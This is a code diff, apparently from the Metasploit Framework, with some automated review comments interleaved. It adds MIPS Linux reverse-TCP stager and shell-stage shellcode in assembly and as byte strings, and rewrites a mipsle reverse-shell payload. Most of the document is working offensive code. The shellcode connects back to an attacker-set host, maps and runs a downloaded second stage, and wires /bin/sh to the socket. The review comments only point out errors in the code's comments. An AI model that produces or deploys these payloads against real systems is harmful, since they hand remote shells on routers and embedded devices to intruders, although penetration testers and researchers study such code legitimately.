diff --git a/external/source/shellcode/linux/mips/stage_tcp_shell.s b/external/source/shellcode/linux/mips/stage_tcp_shell.s
new file mode 100644
index 0000000000..bbe9086fe5
--- /dev/null
+++ b/external/source/shellcode/linux/mips/stage_tcp_shell.s
@@ -0,0 +1,75 @@
+##
+#
+# Name: stage_tcp_shell
+# Type: Stage
+# Qualities: Compatible with both mips little and big endian
+# Platforms: Linux
+# Authors: juan vazquez
+# License:
+#
+# This file is part of the Metasploit Exploit Framework
+# and is subject to the same licenses and copyrights as
+# the rest of this package.
+#
+# Description:
+#
+# This payload duplicates stdio, stdin and stderr to a file descriptor,
+# stored on $s2, and executes /bin/sh.
+#
+# Assemble and create a relocatable object with:
+# as -o stage_tcp_shell.o stage_tcp_shell.s
+#
+# Assemble, link and create an executable ELF with:
+# gcc -o stage_tcp_shell stage_tcp_shell.s
+#
+# The tool "tools/metasm_shell.rb" can be used to easily
+# generate the string to place on:
+# modules/payloads/stages/linux/mipsle/shell.rb
+# and:
+# modules/payloads/stages/linux/mipsbe/shell.rb
+##
+ .text
+ .align 2
+ .globl main
+ .set nomips16
+main:
+ .set noreorder
+ .set nomacro
+
+ # dup2(sockfd, 2)
+ # dup2(sockfd, 1)
+ # dup2(sockfd, 0)
+ # a0: oldfd (sockfd)
+ # a1: newfd (2, 1, 0)
+ # v0: syscall = __NR_dup2 (4063)
+ li $s1, -3
+ nor $s1, $s1, $zero
+ add $a0, $s2, $zero
+dup2_loop:
+ add $a1, $s1, $zero # dup2_loop
+ li $v0, 4063 # sys_dup2
+ syscall 0x40404
+ li $s0, -1
+ addi $s1, $s1, -1
+ bne $s1, $s0, dup2_loop #
+
+ # execve("/bin/sh", ["/bin/sh"], NULL)
+ # a0: filename "/bin/sh"
+ # a1: argv ["/bin/sh", NULL]
+ # a2: envp NULL
+ # v0: syscall = __NR_dup2 (4011)
+ li $t8, -1 # load t8 with -1
+getaddr: # getaddr trick from scut@team-teso.net
+ bltzal $t8, getaddr # branch with $ra stored if t8 < 0
+ slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below)
+ addi $a0, $ra, 28 # $ra gets this address
+ sw $a0, -8($sp)
+ sw $zero, -4($sp)
+ addi $a1, $sp, -8
+ slti $a2, $zero,-1
+ li $v0, 4011 # sys_execve
+ syscall 0x40404
+
+ .string "/bin/sh"
+ .set macro
+ .set reorder
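Review bot: The execve block's register comment `# v0: syscall = __NR_dup2 (4011)` names the wrong syscall; 4011 is the number the file itself labels `sys_execve` on the `li $v0, 4011` line below it, so the comment should read `# v0: syscall = __NR_execve (4011)`. The header sentence `duplicates stdio, stdin and stderr` should be `stdout, stdin and stderr`, matching the three dup2 targets 2, 1, 0 listed under it. `# License:` is left empty although the boilerplate beneath it says the file follows the package licence; either fill the field or drop it. The same header template, with the same empty field, is reused by the two stager sources later in this commit.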
diff --git a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
new file mode 100644
index 0000000000..9aba45eea7
--- /dev/null
+++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
@@ -0,0 +1,127 @@
+##
+#
+# Name: stager_sock_reverse
+# Type: Stager
+# Qualities: No Nulls out of the IP / Port data
+# Platforms: Linux MIPS Big Endian
+# Authors: juan vazquez
+# License:
+#
+# This file is part of the Metasploit Exploit Framework
+# and is subject to the same licenses and copyrights as
+# the rest of this package.
+#
+# Description:
+#
+# Implementation of a MIPS BE Linux reverse TCP stager.
+#
+# File descriptor in $s2.
+#
+# Assemble and create a relocatable object with:
+# as -o stager_sock_reverse.o stager_sock_reverse.s
+#
+# Assemble, link and create an executable ELF with:
+# gcc -o stager_sock_reverse stager_sock_reverse.s
+#
+# The tool "tools/metasm_shell.rb" can be used to easily
+# generate the string to place on:
+# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
+##
+ .text
+ .align 2
+ .globl main
+ .set nomips16
+main:
+ .set noreorder
+ .set nomacro
+
+ # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+ # a0: domain = PF_INET (2)
+ # a1: type = SOCK_STREAM (2)
+ # a2: protocol = IPPROTO_IP (0)
+ # v0: syscall = __NR_socket (4183)
+ li $t7, -6
+ nor $t7, $t7, $zero
+ addi $a0, $t7, -3
+ addi $a1, $t7, -3
+ slti $a2, $zero, -1
+ li $v0, 4183
+ syscall 0x40404
+ sw $v0, -4($sp) # store the file descriptor for the socket on the stack
+
+ # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
+ # a0: sockfd
+ # a1: addr = AF_INET (2)
+ # a2: addrlen = 16
+ # v0: syscall = __NR_connect (4170)
+ lw $a0, -4($sp)
+ li $t7, -3
+ nor $t7, $t7, $zero
+ sw $t7, -32($sp)
+ lui $t6, 0x115c
+ sw $t6, -28($sp)
+ lui $t6, 0x7f00 # ip
+ ori $t6, $t6, 0x0001 # ip
+ sw $t6, -26($sp)
+ addiu $a1, $sp, -30
+ li $t4, -17
+ nor $a2, $t4, $zero
+ li $v0, 4170
+ syscall 0x40404
+
+ # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
+ # a0: addr = -1
+ # a1: lenght = 4096
+ # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
+ # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
+ # sp(16): fd = -1
+ # sp(20): offset = 0
+ # v0: syscall = __NR_mmap (4090)
+ li $a0, -1
+ li $a1, 4097
+ addi $a1, $a1, -1
+ li $t1, -8
+ nor $t1, $t1, $0
+ add $a2, $t1, $0
+ li $a3, 2050
+ li $t3, -22
+ nor $t3, $t3, $zero
+ add $t3, $sp, $t3
+ sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
+ sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
+ li $v0, 4090
+ syscall 0x40404
+ sw $v0, -8($sp) # Stores the mmap'ed address on the stack
+
+ # read(sockfd, addr, 4096)
+ # a0: sockfd
+ # a1: addr
+ # a2: len = 4096
+ # v0: syscall = __NR_read (4003)
+ lw $a0, -4($sp)
+ lw $a1, -8($sp)
+ li $a2, 4097
+ addi $a2, $a2, -1
+ li $v0, 4003
+ syscall 0x40404
+
+ # cacheflush(addr, nbytes, DCACHE)
+ # a0: addr
+ # a1: nbytes
+ # a2: cache = DCACHE (2)
+ # v0: syscall = __NR_read (4147)
+ lw $a0, -8($sp)
+ add $a1, $v0, $zero
+ li $t1, -3
+ nor $t1, $t1, $0
+ add $a2, $t1, $0
+ li $v0, 4147
+ syscall 0x40404
+
+ # jmp to the stage
+ lw $s1, -8($sp)
+ lw $s2, -4($sp)
+ jalr $s1
+
+ .set macro
+ .set reorder
diff --git a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
new file mode 100644
index 0000000000..42083452af
--- /dev/null
+++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s
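Review bot: The cacheflush block is annotated `# v0: syscall = __NR_read (4147)`, but the `li $v0, 4147` it describes is the cacheflush call, so the comment should be `# v0: syscall = __NR_cacheflush (4147)`. In the connect block, `# a1: addr = AF_INET (2)` describes the value stored into the sockaddr rather than the register, which receives the stack pointer built by `addiu $a1, $sp, -30`; and the call summary quotes `sin_addr=inet_addr("192.168.172.1")` while the `lui`/`ori` pair below encodes 0x7f000001 (127.0.0.1), so the summary should state that the address and port halfwords are placeholders patched by the module at generation time. `lenght` in the mmap block should be `length`. The mipsle twin of this file in the next hunk carries the same three comment problems.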
@@ -0,0 +1,127 @@
+##
+#
+# Name: stager_sock_reverse
+# Type: Stager
+# Qualities: No Nulls out of the IP / Port data
+# Platforms: Linux MIPS Little Endian
+# Authors: juan vazquez
+# License:
+#
+# This file is part of the Metasploit Exploit Framework
+# and is subject to the same licenses and copyrights as
+# the rest of this package.
+#
+# Description:
+#
+# Implementation of a MIPS LE Linux reverse TCP stager.
+#
+# File descriptor in $s2.
+#
+# Assemble and create a relocatable object with:
+# as -o stager_sock_reverse.o stager_sock_reverse.s
+#
+# Assemble, link and create an executable ELF with:
+# gcc -o stager_sock_reverse stager_sock_reverse.s
+#
+# The tool "tools/metasm_shell.rb" can be used to easily
+# generate the string to place on:
+# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
+##
+ .text
+ .align 2
+ .globl main
+ .set nomips16
+main:
+ .set noreorder
+ .set nomacro
+
+ # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
+ # a0: domain = PF_INET (2)
+ # a1: type = SOCK_STREAM (2)
+ # a2: protocol = IPPROTO_IP (0)
+ # v0: syscall = __NR_socket (4183)
+ li $t7, -6
+ nor $t7, $t7, $zero
+ addi $a0, $t7, -3
+ addi $a1, $t7, -3
+ slti $a2, $zero, -1
+ li $v0, 4183
+ syscall 0x40404
+ sw $v0, -4($sp) # store the file descriptor for the socket on the stack
+
+ # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
+ # a0: sockfd
+ # a1: addr = AF_INET (2)
+ # a2: addrlen = 16
+ # v0: syscall = __NR_connect (4170)
+ lw $a0, -4($sp)
+ li $t7, -3
+ nor $t7, $t7, $zero
+ sw $t7, -30($sp)
+ ori $t6, $zero, 0x5c11 # port
+ sw $t6, -28($sp)
+ lui $t6, 0x100 # ip
+ ori $t6, $t6, 0x7f # ip
+ sw $t6, -26($sp)
+ addiu $a1, $sp, -30
+ li $t4, -17
+ nor $a2, $t4, $zero
+ li $v0, 4170
+ syscall 0x40404
+
+ # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
+ # a0: addr = -1
+ # a1: lenght = 4096
+ # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
+ # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
+ # sp(16): fd = -1
+ # sp(20): offset = 0
+ # v0: syscall = __NR_mmap (4090)
+ li $a0, -1
+ li $a1, 4097
+ addi $a1, $a1, -1
+ li $t1, -8
+ nor $t1, $t1, $0
+ add $a2, $t1, $0
+ li $a3, 2050
+ li $t3, -22
+ nor $t3, $t3, $zero
+ add $t3, $sp, $t3
+ sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
+ sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
+ li $v0, 4090
+ syscall 0x40404
+ sw $v0, -8($sp) # Stores the mmap'ed address on the stack
+
+ # read(sockfd, addr, 4096)
+ # a0: sockfd
+ # a1: addr
+ # a2: len = 4096
+ # v0: syscall = __NR_read (4003)
+ lw $a0, -4($sp)
+ lw $a1, -8($sp)
+ li $a2, 4097
+ addi $a2, $a2, -1
+ li $v0, 4003
+ syscall 0x40404
+
+ # cacheflush(addr, nbytes, DCACHE)
+ # a0: addr
+ # a1: nbytes
+ # a2: cache = DCACHE (2)
+ # v0: syscall = __NR_read (4147)
+ lw $a0, -8($sp)
+ add $a1, $v0, $zero
+ li $t1, -3
+ nor $t1, $t1, $0
+ add $a2, $t1, $0
+ li $v0, 4147
+ syscall 0x40404
+
+ # jmp to the stage
+ lw $s1, -8($sp)
+ lw $s2, -4($sp) # sockfd saved on $s2
+ jalr $s1
+
+ .set macro
+ .set reorder
diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
index d69ec65072..08223e2b74 100644
--- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb
@@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org) -# + Few removals of unneccessary zero bytes by kost - require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell'
@@ -21,7 +18,11 @@ module Metasploit3
 super(merge_info(info,
 'Name' => 'Linux Command Shell, Reverse TCP Inline',
 'Description' => 'Connect back to attacker and spawn a command shell',
- 'Author' => 'Julien Tinnes',
+ 'Author' =>
+ [
+ 'rigan ', # Original (mipsbe) shellcode
+ 'juan vazquez' # Metasploit module
+ ],
 'License' => MSF_LICENSE,
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
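Review bot: The new author entry `'rigan ', # Original (mipsbe) shellcode` carries a trailing space inside the literal and looks truncated — presumably a contact handle was meant to follow the name — so either complete it or trim it to `'rigan',`. The comment also credits a mipsbe origin inside a module whose `'Arch' => ARCH_MIPSLE` two lines lower; if the bytes were re-encoded from a big-endian original, say so explicitly (`# Original shellcode (ported from mipsbe)`), otherwise fix the architecture word. The enclosing `initialize` begins outside the hunk.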
@@ -47,74 +48,72 @@ module Metasploit3 port = [port].pack("n").unpack("cc") shellcode = - "\xef\xff\x09\x24" + # li t1,-17 - "\xff\xff\x10\x05" + # bltzal t0,0x4 - "\x82\x82\x08\x28" + # slti t0,zero,-32126 - "\x27\x48\x20\x01" + # nor t1,t1,zero - "\x21\xc8\x3f\x01" + # addu t9,t1,ra - "\x48\x85\xb9\xaf" + # sw t9,-31416(sp) - "\x48\x85\xb9\x23" + # addi t9,sp,-31416 - "\x00\x00\x1c\x3c" + # lui gp,0x0 - "\x00\x00\x9c\x27" + # addiu gp,gp,0 - "\x21\xe0\x99\x03" + # addu gp,gp,t9 - "\x00\x00\x89\x8f" + # lw t1,0(gp) - "\xd8\xff\xbd\x27" + # addiu sp,sp,-40 - "\xe8\x00\x2a\x25" + # addiu t2,t1,232 - "\x04\x00\x47\x8d" + # lw a3,4(t2) - "\xe8\x00\x28\x8d" + # lw t0,232(t1) - host[2..3].pack("C2") + "\x04\x3c" + # lui a0,0x901 - host[0..1].pack("C2") + "\x83\x34" + # ori v1,a0,0xa8c0 - "\x18\x00\xb9\x27" + # addiu t9,sp,24 - "\x02\x00\x06\x24" + # li a2,2 - port.pack("C2") + "\x05\x24" + # li a1,9746 - "\x08\x00\xa6\xa7" + # sh a2,8(sp) - "\x0a\x00\xa5\xa7" + # sh a1,10(sp) - "\x18\x00\xa8\xaf" + # sw t0,24(sp) - "\x1c\x00\xa7\xaf" + # sw a3,28(sp) - "\x0c\x00\xa3\xaf" + # sw v1,12(sp) - "\x20\x00\xb9\xaf" + # sw t9,32(sp) - "\x24\x00\xa0\xaf" + # sw zero,36(sp) - "\x02\x00\x04\x24" + # li a0,2 - "\x02\x00\x05\x24" + # li a1,2 - "\x21\x30\x00\x00" + # move a2,zero - "\x57\x10\x02\x24" + # li v0,4183 - "\x0c\x01\x01\x01" + # syscall - "\x21\x18\x40\x00" + # move v1,v0 - "\xff\xff\x02\x24" + # li v0,-1 - "\x1a\x00\x62\x10" + # beq v1,v0,0xf4 - "\x01\x00\x04\x24" + # li a0,1 - "\x21\x20\x60\x00" + # move a0,v1 - "\x08\x00\xa5\x27" + # addiu a1,sp,8 - "\x10\x00\x06\x24" + # li a2,16 - "\x4a\x10\x02\x24" + # li v0,4170 - "\x0c\x01\x01\x01" + # syscall - "\x0e\x00\x40\x14" + # bnez v0,0xe0 - "\x21\x28\x00\x00" + # move a1,zero - "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x01\x01\x01" + # syscall - "\x01\x00\x05\x24" + # li a1,1 - "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x01\x01\x01" + # syscall - "\x02\x00\x05\x24" + # li a1,2 - "\xdf\x0f\x02\x24" + # li v0,4063 - 
"\x0c\x01\x01\x01" + # syscall - "\x21\x30\x00\x00" + # move a2,zero - "\x21\x20\x20\x03" + # move a0,t9 - "\x20\x00\xa5\x27" + # addiu a1,sp,32 - "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x01\x01\x01" + # syscall - "\x21\x20\x00\x00" + # move a0,zero - "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x01\x01\x01" + # syscall - "\x08\x00\xe0\x03" + # jr ra - "\x28\x00\xbd\x27" + # addiu sp,sp,40 - "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x01\x01\x01" + # syscall - "\xe5\xff\x00\x10" + # b 0x94 - "\x21\x20\x60\x00" + # move a0,v1 - "\x2f\x62\x69\x6e" + # "/bin" - "\x2f\x73\x68\x00" + # "/sh\x00" - "0"*80 + # sys_socket + # a0: domain + # a1: type + # a2: protocol + "\xfa\xff\x0f\x24" + # li t7,-6 + "\x27\x78\xe0\x01" + # nor t7,t7,zero + "\xfd\xff\xe4\x21" + # addi a0,t7,-3 + "\xfd\xff\xe5\x21" + # addi a1,t7,-3 + "\xff\xff\x06\x28" + # slti a2,zero,-1 + "\x57\x10\x02\x24" + # li v0,4183 # sys_socket + "\x0c\x01\x01\x01" + # syscall 0x40404 + + # sys_connect + # a0: sockfd (stored on the stack) + # a1: addr (data stored on the stack) + # a2: addrlen + "\xff\xff\xa2\xaf" + # sw v0,-1(sp) + "\xff\xff\xa4\x8f" + # lw a0,-1(sp) + "\xfd\xff\x0f\x34" + # li t7,0xfffd + "\x27\x78\xe0\x01" + # nor t7,t7,zero + "\xe2\xff\xaf\xaf" + # sw t7,-30(sp) + port.pack("C2") + "\x0e\x3c" + # lui t6,0x1f90 + port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90 + "\xe4\xff\xae\xaf" + # sw t6,-28(sp) + host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01 + host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101 + "\xe6\xff\xae\xaf" + # sw t6,-26(sp) + "\xe2\xff\xa5\x27" + # addiu a1,sp,-30 + "\xef\xff\x0c\x24" + # li t4,-17 + "\x27\x30\x80\x01" + # nor a2,t4,zero + "\x4a\x10\x02\x24" + # li v0,4170 # sys_connect + "\x0c\x01\x01\x01" + # syscall 0x40404 + + # sys_dup2 + # a0: oldfd (socket) + # a1: newfd (0, 1, 2) + "\xfd\xff\x11\x24" + # li s1,-3 + "\x27\x88\x20\x02" + # nor s1,s1,zero + "\xff\xff\xa4\x8f" + # lw a0,-1(sp) + "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop + "\xdf\x0f\x02\x24" + # li 
v0,4063 # sys_dup2 + "\x0c\x01\x01\x01" + # syscall 0x40404 + "\xff\xff\x10\x24" + # li s0,-1 + "\xff\xff\x31\x22" + # addi s1,s1,-1 + "\xfa\xff\x30\x16" + # bne s1,s0,68 + + # sys_execve + # a0: filename (stored on the stack) "//bin/sh" + # a1: argv "//bin/sh" + # a2: envp (null) + "\xff\xff\x06\x28" + # slti a2,zero,-1 + "\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi" + "\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//" + "\xec\xff\xaf\xaf" + # sw t7,-20(sp) + "\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh" + "\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/" + "\xf0\xff\xae\xaf" + # sw t6,-16(sp) + "\xf4\xff\xa0\xaf" + # sw zero,-12(sp) + "\xec\xff\xa4\x27" + # addiu a0,sp,-20 + "\xf8\xff\xa4\xaf" + # sw a0,-8(sp) + "\xfc\xff\xa0\xaf" + # sw zero,-4(sp) + "\xf8\xff\xa5\x27" + # addiu a1,sp,-8 + "\xab\x0f\x02\x24" + # li v0,4011 # sys_execve + "\x0c\x01\x01\x01" # syscall 0x40404 + + return super + shellcode end end diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb new file mode 100644 index 0000000000..4dd0c08440 --- /dev/null +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb 
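Review bot: The byte comments in the new connect section name fixed immediates — `# lui t6,0x1f90`, `# ori t6,t6,0x1f90`, `# lui t6,0x7f01`, `# ori t6,t6,0x101` — although those halfwords are spliced in at generation time by the `port.pack("C2")` and `host[..]` expressions on the same lines, and `0x1f90` does not match the 4444 the stager sources in this commit use, so anyone checking bytes against comments will be misled. Writing them as `# lui t6,<port>` / `# ori t6,t6,<host lo16>` states what the operand really is. `"\xce\x35" +# ori t6,t6,0x101` is also missing the space every other line puts between `+` and `#`. The enclosing method starts outside the hunk.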
@@ -0,0 +1,56 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+
+module Metasploit3
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Linux
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Reverse TCP Stager',
+ 'Description' => 'Connect back to the attacker',
+ 'Author' =>
+ [
+ 'juan vazquez'
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Stager' =>
+ {
+ 'Offsets' =>
+ {
+ 'LHOST' => [ [58, 62], 'ADDR16MSB' ],
+ 'LPORT' => [ 50, 'n' ],
+ },
+ 'Payload' =>
+ "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
+ "\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
+ "\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
+ "\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
+ "\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
+ "\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
+ "\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
+ "\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
+ "\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
+ "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
+ "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
+ "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
+ "\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
+ "\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
+ "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
+ "\xf8\x09"
+ }
+ ))
+ end
+
+end
diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
new file mode 100644
index 0000000000..9b123da4bb
--- /dev/null
+++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
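Review bot: The `'Payload'` blob carries no pointer back to the source it was assembled from, so nothing tells a maintainer that editing `external/source/shellcode/linux/mipsbe/stager_sock_reverse.s` also means regenerating these bytes and recomputing the `'Offsets'` (`LHOST` at 58/62, `LPORT` at 50), which are byte positions into the blob and go stale silently. A one-line comment above `'Payload' =>`, e.g. `# Assembled from external/source/shellcode/linux/mipsbe/stager_sock_reverse.s via tools/metasm_shell.rb; the Offsets above index into these bytes`, would close that gap. The same applies to the mipsle stager and the two stage modules that follow in this commit.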
@@ -0,0 +1,56 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+
+module Metasploit3
+
+ include Msf::Payload::Stager
+ include Msf::Payload::Linux
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Reverse TCP Stager',
+ 'Description' => 'Connect back to the attacker',
+ 'Author' =>
+ [
+ 'juan vazquez'
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Stager' =>
+ {
+ 'Offsets' =>
+ {
+ 'LHOST' => [ [60, 56], 'ADDR16MSB' ],
+ 'LPORT' => [ 48, 'n' ],
+ },
+ 'Payload' =>
+ "\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
+ "\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
+ "\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
+ "\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
+ "\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
+ "\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
+ "\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
+ "\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
+ "\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
+ "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
+ "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
+ "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
+ "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
+ "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
+ "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
+ "\x20\x02"
+ }
+ ))
+ end
+
+end
diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb
new file mode 100644
index 0000000000..59e40539ac
--- /dev/null
+++ b/modules/payloads/stages/linux/mipsbe/shell.rb
@@ -0,0 +1,36 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+ include Msf::Payload::Linux
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Linux Command Shell',
+ 'Description' => 'Spawn a command shell (staged)',
+ 'Author' => 'juan vazquez',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSBE,
+ 'Session' => Msf::Sessions::CommandShellUnix,
+ 'Stage' =>
+ {
+ 'Payload' =>
+ "\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20\x02\x20" +
+ "\x28\x20\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff" +
+ "\x22\x31\xff\xff\x16\x11\xff\xfa\x24\x18\xff\xff\x07\x10" +
+ "\xff\xff\x28\x18\xff\xff\x23\xe4\x00\x1c\xaf\xa4\xff\xf8" +
+ "\xaf\xa0\xff\xfc\x23\xa5\xff\xf8\x28\x06\xff\xff\x24\x02" +
+ "\x0f\xab\x01\x01\x01\x0c\x2f\x62\x69\x6e\x2f\x73\x68\x00"
+ }
+ ))
+ end
+
+end
diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb
new file mode 100644
index 0000000000..97915d3480
--- /dev/null
+++ b/modules/payloads/stages/linux/mipsle/shell.rb
@@ -0,0 +1,36 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+ include Msf::Payload::Linux
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Linux Command Shell',
+ 'Description' => 'Spawn a command shell (staged)',
+ 'Author' => 'juan vazquez',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE,
+ 'Session' => Msf::Sessions::CommandShellUnix,
+ 'Stage' =>
+ {
+ 'Payload' =>
+ "\xfd\xff\x11\x24\x27\x88\x20\x02\x20\x20\x40\x02\x20\x28" +
+ "\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24" +
+ "\xff\xff\x31\x22\xfa\xff\x11\x16\xff\xff\x18\x24\xff\xff" +
+ "\x10\x07\xff\xff\x18\x28\x1c\x00\xe4\x23\xf8\xff\xa4\xaf" +
+ "\xfc\xff\xa0\xaf\xf8\xff\xa5\x23\xff\xff\x06\x28\xab\x0f" +
+ "\x02\x24\x0c\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x00"
+ }
+ ))
+ end
+
+end
diff --git a/tools/metasm_shell.rb b/tools/metasm_shell.rb
index a7d3680822..68f8126db1 100755
--- a/tools/metasm_shell.rb
+++ b/tools/metasm_shell.rb
@@ -3,7 +3,8 @@
 # $Id$
 #
 # This tool provides an easy way to see what opcodes are associated with
-# certain x86 instructions by making use of Metasm!
+# certain x86 instructions by making use of Metasm! Also allows to get
+# friendly output from a GAS assembler source code file.
 #
 #
 # $Revision$
